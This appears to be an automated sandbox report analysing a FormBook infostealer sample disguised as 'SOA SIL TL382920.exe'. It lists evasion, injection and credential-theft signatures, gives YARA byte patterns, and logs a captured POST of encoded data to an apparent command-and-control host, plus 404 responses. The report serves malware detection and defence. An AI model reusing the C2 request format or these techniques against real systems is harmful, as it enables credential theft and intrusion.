Edit tour

Windows Analysis Report
SOA SIL TL382920.exe

Overview

General Information

Sample name:	SOA SIL TL382920.exe (renamed file extension from bat to exe)
Original sample name:	SOA SIL TL382920.bat
Analysis ID:	1527911
MD5:	caec46aaace8e50a9763dffc6c4acf0e
SHA1:	c22d85132ebd62cdf65ced2b203dca7f61490b89
SHA256:	664f584ad45e11d7afe3e4bb326959f6041653f22115327800341fa33eb19080
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64native

SOA SIL TL382920.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\SOA SIL TL382920.exe" MD5: CAEC46AAACE8E50A9763DFFC6C4ACF0E)

SOA SIL TL382920.exe (PID: 7908 cmdline: "C:\Users\user\Desktop\SOA SIL TL382920.exe" MD5: CAEC46AAACE8E50A9763DFFC6C4ACF0E)

RAVCpl64.exe (PID: 6744 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)

replace.exe (PID: 7220 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: 82B9440BF8D788460BE2FDD73C324659)

MBLUUsWuClSd.exe (PID: 580 cmdline: "C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: 7B12552FD2A5948256B20EC97B708F94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.23445436246.0000000002F10000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.23442870422.0000000001620000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x39aed:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x21c2c:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.21337354866.0000000006A50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.23445613909.0000000002F60000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.23441073519.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13e8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.21274738404.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f013:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17152:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: SOA SIL TL382920.exe PID: 7820	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.SOA SIL TL382920.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.SOA SIL TL382920.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f013:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17152:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.SOA SIL TL382920.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.SOA SIL TL382920.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e213:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

HTTP traffic detected: POST /4yov/ HTTP/1.1Host: www.concept.pinkAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.concept.pinkReferer: http://www.concept.pink/4yov/Connection: closeContent-Length: 205Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 55 48 36 6c 6f 64 38 50 2f 31 70 6e 4f 49 43 4d 39 59 30 4c 34 35 51 33 75 79 62 4f 48 65 6e 42 74 6b 31 2b 67 58 78 33 55 74 32 6a 6c 63 52 73 48 4c 6a 41 6e 44 7a 4c 52 79 2f 71 41 75 6b 45 74 67 61 37 6d 5a 38 37 76 66 46 50 38 2f 74 2b 6f 44 74 56 6f 4d 5a 30 51 4b 49 39 75 4c 66 2b 41 44 59 54 33 55 68 59 57 55 6c 4a 4f 51 5a 74 51 57 78 47 55 68 59 32 6c 34 4f 41 5a 65 4f 48 44 48 65 68 51 46 30 74 67 39 50 6c 76 73 32 74 7a 6a 32 75 4a 37 67 38 65 50 70 58 78 39 39 65 34 49 59 5a 4e 48 53 41 41 4e 7a 75 56 36 49 49 59 48 70 68 64 77 3d 3d Data Ascii: VzK4o8Jx=9JO441eEy3RNUH6lod8P/1pnOICM9Y0L45Q3uybOHenBtk1+gXx3Ut2jlcRsHLjAnDzLRy/qAukEtga7mZ87vfFP8/t+oDtVoMZ0QKI9uLf+ADYT3UhYWUlJOQZtQWxGUhY2l4OAZeOHDHehQF0tg9Plvs2tzj2uJ7g8ePpXx99e4IYZNHSAANzuV6IIYHphdw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:51:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:51:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:51:54 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:51:57 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:52:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 2b 5c f4 65 47 34 04 64 b6 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 da 49 da 99 f0 3d 17 d5 1b a5 f9 dd 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 be 0a 02 3f 38 64 83 9a 58 46 9b 30 b0 1b a5 62 47 b0 46 66 dd 51 b4 c1 d6 7d 66 b9 08 2a 30 18 69 24 3c b4 6c b3 8d 8a f2 cd bc 3b 48 46 4b e3 b4 ed 77 c6 19 a2 db c6 10 b6 12 fa ab 45 e6 6b a5 28 e5 32 c6 eb e4 a9 d5 ee b6 5c a7 db 8b 80 07 ea 4b 05 c5 7e b8 72 ab 95 be a0 2e a7 4a 74 ef 29 d6 3b ce e6 c2 a6 86 e7 47 24 52 a4 ae 60 a0 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 8f f7 e2 dd e4 83 e4 06 9e 77 f1 b7 17 6f c7 77 e8 f5 f6 92 d7 0e 87 2b 75 78 a1 f6 d7 b6 41 a8 cd b0 da 8b a2 61 78 d6 b2 e0 74 26 dc 56 3b 83 e7 6f f8 ae eb 6f 09 cf f7 87 0a 28 c1 03 fc 00 68 51 01 f0 2c 83 2e 39 73 ab 0d 6f ef 43 98 bf d1 e8 66 f2 7e 72 b3 6e c9 66 dd c2 3c 9a f5 99 c9 74 55 ab 95 7a b8 b1 15 c8 e1 10 9d a6 0a 9e 2d 6f b1 2f b6 e0 0b a0 83 85 95 d8 2c 3d 3f 8c 40 1e 46 18 c9 c8 b1 61 80 99 51 a7 74 6d a4 e3 93 9d 96 27 da 98 b1 88 c1 d4 50 9a e1 8b de 72 b3 3e 5c dc a6 a3 34 7a e1 a2 cf 6e a3 7a 3b 68 c6 bb da 4c f1 13 b2 5f fc 84 6d fa 60 9f 15 a7 54 3d 5c 34 dd f6 28 8a 7c 2f cc f4 8c f9 16 8c af 5f 42 4a fd 00 e5 bb 7e d0 62 eb 2a cf 26 88 a5 2f 42 e7 3d d5 82 dd 07 d2 65 23 a4 ba cc db e7 7a 4b eb b3 41 c0 c1 85 2e 86 b2 d3 81 79 5a 2e 21 66 16 71 44 c8 1a 75 d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 60 28 f2 f5 92 1c 0c 57 50 b7 15 fa a3 c0 56 8d 6c 68 62 e2 52 f3 37 d4 9a 90 27 8a f3 24 47 29 ca cd 54 5d f0 bf 83 e7 d1 f1 07 d2 c9 09 3d 73 92 82 c8 ba 82 e5 a9 2d 6b 75 14 0d 32 c9 a6 a4 a6 72 8a 25 a3 41 26 f1 12 15 d9 98 8d 74 ba 5e 23 84 62 bc 4e 0b 7d 1c 3c c1 f8 1f 00 c2 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f f3 ff a3 05 97 0b 87 d2 9b 83 d1 61 e0 0f 7c 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 09:52:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 2b 5c f4 65 47 34 04 64 b6 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 da 49 da 99 f0 3d 17 d5 1b a5 f9 dd 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 be 0a 02 3f 38 64 83 9a 58 46 9b 30 b0 1b a5 62 47 b0 46 66 dd 51 b4 c1 d6 7d 66 b9 08 2a 30 18 69 24 3c b4 6c b3 8d 8a f2 cd bc 3b 48 46 4b e3 b4 ed 77 c6 19 a2 db c6 10 b6 12 fa ab 45 e6 6b a5 28 e5 32 c6 eb e4 a9 d5 ee b6 5c a7 db 8b 80 07 ea 4b 05 c5 7e b8 72 ab 95 be 